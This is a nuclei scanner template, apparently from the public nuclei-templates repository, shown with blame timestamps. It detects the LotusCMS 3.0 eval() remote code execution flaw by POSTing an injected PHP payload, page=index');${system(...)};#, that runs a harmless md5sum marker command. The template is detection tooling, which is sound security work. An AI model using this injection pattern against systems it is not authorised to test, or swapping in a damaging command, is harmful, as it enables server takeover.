nuclei-templates/vulnerabilities/other/lotuscms-rce.yaml

30 lines
622 B
YAML
Raw Normal View History

2021-07-04 11:11:19 +00:00
id: lotuscms-rce
info:
2021-07-04 11:39:45 +00:00
name: LotusCMS 3.0 eval() RCE
2021-07-04 11:11:19 +00:00
author: pikpikcu
severity: critical
reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit
tags: lotuscms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/index.php"
2021-07-04 11:39:45 +00:00
- "{{BaseURL}}/lcms/index.php"
2021-07-04 11:11:19 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
body: |
2021-07-04 11:39:45 +00:00
page=index');${system('echo lotuscms_rce | md5sum')};#
2021-07-04 11:11:19 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-04 11:39:45 +00:00
- "38ee63071a04dc5e04ed22624c38e648"
2021-07-04 11:11:19 +00:00
part: body
- type: status
status:
2021-07-04 11:39:45 +00:00
- 200